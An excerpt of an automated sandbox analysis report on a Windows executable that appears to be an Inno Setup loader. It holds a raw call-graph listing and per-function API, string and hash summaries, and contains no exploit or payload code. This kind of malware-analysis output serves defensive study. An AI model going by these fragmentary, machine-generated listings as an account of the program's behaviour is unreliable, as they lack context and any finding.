5113 408da8 5112->5113 5114 408dc8 5113->5114 5272 408c80 5114->5272 5117 405890 5118 405897 5117->5118 5119 4031e8 18 API calls 5118->5119 5120 4058af 5119->5120 5120->5027 5122 4031be 5121->5122 5123 4031e3 5122->5123 5124 4025ac 4 API calls 5122->5124 5125 403198 5123->5125 5124->5122 5126 4031b7 5125->5126 5127 40319e 5125->5127 5126->4991 5126->5070 5127->5126 5128 4025ac 4 API calls 5127->5128 5128->5126 5130 4051c5 5129->5130 5137 404e58 5130->5137 5133 4051f1 5142 403278 5133->5142 5139 404e73 5137->5139 5138 404e85 5138->5133 5147 404be4 5138->5147 5139->5138 5150 404f7a 5139->5150 5157 404e4c 5139->5157 5143 403254 18 API calls 5142->5143 5144 403288 5143->5144 5145 403198 4 API calls 5144->5145 5146 4032a0 5145->5146 5146->5109 5264 405940 5147->5264 5149 404bf5 5149->5133 5151 404f8b 5150->5151 5156 404fd9 5150->5156 5154 40505f 5151->5154 5151->5156 5153 404ff7 5153->5139 5154->5153 5164 404e38 5154->5164 5156->5153 5160 404df4 5156->5160 5158 403198 4 API calls 5157->5158 5159 404e56 5158->5159 5159->5139 5161 404e02 5160->5161 5167 404bfc 5161->5167 5163 404e30 5163->5156 5194 4039a4 5164->5194 5170 4059b0 5167->5170 5169 404c15 5169->5163 5171 4059be 5170->5171 5180 404cdc LoadStringA 5171->5180 5174 405194 33 API calls 5175 4059f6 5174->5175 5183 4031e8 5175->5183 5178 4031b8 4 API calls 5179 405a1b 5178->5179 5179->5169 5181 403278 18 API calls 5180->5181 5182 404d09 5181->5182 5182->5174 5184 4031ec 5183->5184 5187 4031fc 5183->5187 5184->5187 5189 403254 5184->5189 5185 403228 5185->5178 5187->5185 5188 4025ac 4 API calls 5187->5188 5188->5185 5190 403274 5189->5190 5191 403258 5189->5191 5190->5187 5192 402594 18 API calls 5191->5192 5193 403261 5192->5193 5193->5187 5195 4039ab 5194->5195 5200 4038b4 5195->5200 5197 4039cb 5198 403198 4 API calls 5197->5198 5199 4039d2 5198->5199 5199->5153 5201 4038d5 5200->5201 5202 4038c8 5200->5202 5204 403934 5201->5204 5205 4038db 5201->5205 5228 403780 5202->5228 5206 403993 5204->5206 5207 40393b 
5204->5207 5208 4038e1 5205->5208 5209 4038ee 5205->5209 5212 4037f4 3 API calls 5206->5212 5213 403941 5207->5213 5214 40394b 5207->5214 5235 403894 5208->5235 5211 403894 6 API calls 5209->5211 5217 4038fc 5211->5217 5215 4038d0 5212->5215 5250 403864 5213->5250 5216 4037f4 3 API calls 5214->5216 5215->5197 5219 40395d 5216->5219 5240 4037f4 5217->5240 5221 403864 23 API calls 5219->5221 5223 403976 5221->5223 5222 403917 5246 40374c 5222->5246 5225 40374c VariantClear 5223->5225 5227 40398b 5225->5227 5226 40392c 5226->5197 5227->5197 5229 4037f0 5228->5229 5231 403744 5228->5231 5229->5215 5230 403793 VariantClear 5230->5231 5231->5228 5231->5230 5232 403198 4 API calls 5231->5232 5233 4037ab 5231->5233 5234 4037dc VariantCopyInd 5231->5234 5232->5231 5233->5215 5234->5229 5234->5231 5255 4036b8 5235->5255 5238 40374c VariantClear 5239 4038a9 5238->5239 5239->5215 5241 403845 VariantChangeTypeEx 5240->5241 5242 40380a VariantChangeTypeEx 5240->5242 5243 403832 5241->5243 5244 403826 5242->5244 5243->5222 5245 40374c VariantClear 5244->5245 5245->5243 5247 403766 5246->5247 5248 403759 5246->5248 5247->5226 5248->5247 5249 403779 VariantClear 5248->5249 5249->5226 5261 40369c SysStringLen 5250->5261 5253 40374c VariantClear 5254 403882 5253->5254 5254->5215 5256 4036cb 5255->5256 5257 403706 MultiByteToWideChar SysAllocStringLen MultiByteToWideChar 5256->5257 5258 4036db 5256->5258 5259 40372e 5257->5259 5260 4036ed MultiByteToWideChar SysAllocStringLen 5258->5260 5259->5238 5260->5259 5262 403610 21 API calls 5261->5262 5263 4036b3 5262->5263 5263->5253 5265 40594c 5264->5265 5266 404cdc 19 API calls 5265->5266 5267 405972 5266->5267 5268 4031e8 18 API calls 5267->5268 5269 40597d 5268->5269 5270 403198 4 API calls 5269->5270 5271 405992 5270->5271 5271->5149 5273 403198 4 API calls 5272->5273 5275 408cb1 5272->5275 5273->5275 5274 4031b8 4 API calls 5276 408d69 5274->5276 5277 408cc8 5275->5277 5278 403278 18 API calls 5275->5278 5280 408cdc 5275->5280 5281 
4032fc 18 API calls 5275->5281 5276->5117 5279 4032fc 18 API calls 5277->5279 5278->5275 5279->5280 5280->5274 5281->5275 5283 4034fd 5282->5283 5290 40352d 5282->5290 5284 403526 5283->5284 5286 403509 5283->5286 5287 403254 18 API calls 5284->5287 5285 403198 4 API calls 5288 403517 5285->5288 5291 4025c4 5286->5291 5287->5290 5288->5048 5290->5285 5292 4025ca 5291->5292 5293 4025dc 5292->5293 5295 403154 5292->5295 5293->5288 5293->5293 5296 403164 5295->5296 5297 40318c TlsGetValue 5295->5297 5296->5293 5298 403196 5297->5298 5299 40316f 5297->5299 5298->5293 5303 40310c 5299->5303 5301 403174 TlsGetValue 5302 403184 5301->5302 5302->5293 5304 403120 LocalAlloc 5303->5304 5305 403116 5303->5305 5306 403132 5304->5306 5307 40313e TlsSetValue 5304->5307 5305->5304 5306->5301 5307->5306 5309 406b1c 5308->5309 5310 403278 18 API calls 5309->5310 5311 406b29 5310->5311 5318 403420 5311->5318 5313 406b31 5314 4031e8 18 API calls 5313->5314 5315 406b49 5314->5315 5316 403198 4 API calls 5315->5316 5317 406b6b 5316->5317 5317->5051 5319 403437 5318->5319 5320 403426 5318->5320 5319->5313 5320->5319 5321 403254 18 API calls 5320->5321 5321->5319 5323 4033bc 5322->5323 5324 403254 18 API calls 5323->5324 5325 4033cf 5324->5325 5326 4031e8 18 API calls 5325->5326 5327 4033f7 5326->5327 5329 402bd5 RaiseException 5328->5329 5330 402be6 5328->5330 5329->5330 5330->5074 5332 408e8e 5331->5332 5334 408ea6 5332->5334 5344 408e18 5332->5344 5335 408e18 18 API calls 5334->5335 5336 408eca 5334->5336 5335->5336 5347 407918 5336->5347 5338 408ee5 5339 408e18 18 API calls 5338->5339 5341 408ef8 5338->5341 5339->5341 5340 408e18 18 API calls 5340->5341 5341->5340 5342 403278 18 API calls 5341->5342 5343 408f27 5341->5343 5342->5341 5343->5080 5345 405890 18 API calls 5344->5345 5346 408e29 5345->5346 5346->5334 5350 4078c4 5347->5350 5351 4078d6 5350->5351 5352 4078e7 5350->5352 5353 4078db InterlockedExchange 5351->5353 5352->5338 5353->5352 5362 408f70 5354->5362 5356 408fd2 5357 
408fd6 5356->5357 5358 408ff2 DeleteFileA GetLastError 5356->5358 5357->5084 5359 409010 5358->5359 5368 408fac 5359->5368 5363 408f7a 5362->5363 5364 408f7e 5362->5364 5363->5356 5365 408fa0 SetLastError 5364->5365 5366 408f87 Wow64DisableWow64FsRedirection 5364->5366 5367 408f9b 5365->5367 5366->5367 5367->5356 5369 408fb1 Wow64RevertWow64FsRedirection 5368->5369 5370 408fbb 5368->5370 5369->5370 5370->5084 5372 403566 5371->5372 5374 403578 5372->5374 5375 403604 5372->5375 5374->5098 5376 40357c 5375->5376 5379 4035d0 5376->5379 5380 40359b 5376->5380 5383 4035a0 5376->5383 5385 4035b6 5376->5385 5377 4035b1 5381 403198 4 API calls 5377->5381 5378 4035b8 5382 4031b8 4 API calls 5378->5382 5379->5385 5386 40357c 4 API calls 5379->5386 5380->5383 5384 4035ec 5380->5384 5381->5385 5382->5385 5383->5377 5383->5378 5384->5385 5387 403554 4 API calls 5384->5387 5385->5372 5386->5379 5387->5384 6678 401ab9 6679 401a96 6678->6679 6680 401aa9 RtlDeleteCriticalSection 6679->6680 6681 401a9f RtlLeaveCriticalSection 6679->6681 6681->6680

Control-flow Graph (function 409b78-409c33: GetSystemInfo, VirtualQuery, VirtualProtect; executed / not-executed basic-block graph omitted)
APIs
• GetSystemInfo.KERNEL32(?), ref: 00409B8A
• VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B95
• VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BD6
• VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409C08
• VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409C18
Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Virtual$ProtectQuery$InfoSystem
• String ID:
• API String ID: 2441996862-0
• Opcode ID: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
• Instruction ID: 4a1d84bb43d4a47cf168f169447d483ed62c711ee8ccb48f5bfbfd053dbeaed9
• Opcode Fuzzy Hash: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
• Instruction Fuzzy Hash: D421A1B16043006BDA309AA99C85E57B7E8AF45360F144C2BFA99E72C3D239FC40C669
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                                                                                                                                                                  Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,0040A618), ref: 00404582
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
• GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
• GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
• SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,0040A618), ref: 004045C6
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressProc$HandleModulePolicyProcess
• String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
• API String ID: 3256987805-3653653586
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph

APIs
• SetLastError.KERNEL32 ref: 0040AAC1
  • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,02100420), ref: 0040966C
• CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
• SetWindowLongA.USER32(000104B0,000000FC,00409960), ref: 0040AB15
• RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
• DestroyWindow.USER32(000104B0,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Window$ErrorLast$CreateDestroyDirectoryLongRemove
• String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
• API String ID: 3757039580-3001827809
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090C4
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090DE
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
• API String ID: 1646373207-2130885113
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph

APIs
• CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
• SetWindowLongA.USER32(000104B0,000000FC,00409960), ref: 0040AB15
  • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040AB86,?), ref: 00406B94
  • Part of subcall function 004099EC: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02100420,00409AD8,00000000,00409ABF), ref: 00409A5C
  • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02100420,00409AD8,00000000), ref: 00409A70
  • Part of subcall function 004099EC: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
  • Part of subcall function 004099EC: GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
  • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02100420,00409AD8), ref: 00409AA4
• RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
• DestroyWindow.USER32(000104B0,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
• String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
• API String ID: 3586484885-3001827809
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02100420,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02100420,00409AD8,00000000), ref: 00409A70
                                                                                                                                                                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                                                                                                                                                                  • GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02100420,00409AD8), ref: 00409AA4
                                                                                                                                                                                                                                    • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,02100420), ref: 0040966C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                                                                                                                                                                  • String ID: D
                                                                                                                                                                                                                                  • API String ID: 3356880605-2746444292
                                                                                                                                                                                                                                  • Opcode ID: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                                                                                                                                                                  • Instruction ID: b58d0f6e2b8975977e6c7b71aada5392bea55c03070ce9fad3dcef5aa6d4018a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE1142B16402486EDB00EBE6CC42F9EB7ACEF49714F50013BB604F72C6DA785D048A69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 136 401918-40193a RtlInitializeCriticalSection 137 401946-40197c call 4012dc * 3 LocalAlloc 136->137 138 40193c-401941 RtlEnterCriticalSection 136->138 145 4019ad-4019c1 137->145 146 40197e 137->146 138->137 150 4019c3-4019c8 RtlLeaveCriticalSection 145->150 151 4019cd 145->151 147 401983-401995 146->147 147->147 149 401997-4019a6 147->149 149->145 150->151
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                                                                                                                                                                  • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                                                                                                                                                                  • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 730355536-0
                                                                                                                                                                                                                                  • Opcode ID: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                                                                                                                                                                  • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                                                  • String ID: .tmp$y@
                                                                                                                                                                                                                                  • API String ID: 2030045667-2396523267
                                                                                                                                                                                                                                  • Opcode ID: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                                                                                                                                                                  • Instruction ID: 5e9257013af3d55ef2b6e359c41f87f67318ae2a4e6dbf07461b5d8c6de74657
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B41C030704200CFD311EF25DED1A1A77A5EB49304B214A3AF804B73E1CAB9AC11CBAD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                                                  • String ID: .tmp$y@
                                                                                                                                                                                                                                  • API String ID: 2030045667-2396523267
                                                                                                                                                                                                                                  • Opcode ID: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                                                                                                                                                                  • Instruction ID: 95bba075cf9db07042691c1556ef0613dbe482a65a3614fff4d0ead14828e6f7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E341BE30700200DFC711EF65DED2A1A77A5EB49304B104A3AF804B73E2CAB9AC01CBAD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
• GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID: .tmp
• API String ID: 1375471231-2986845003
• Opcode ID: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
• Instruction ID: b240cf9bc22f775501a2d99da134be40bb2f76fb21a7d6e050461713caae6e8b
• Opcode Fuzzy Hash: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
• Instruction Fuzzy Hash: 9E216774A00208ABDB05EFA1C8429DFB7B8EF88304F50457BE901B73C2DA3C9E058A65
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph (legend: Executed / Not Executed)
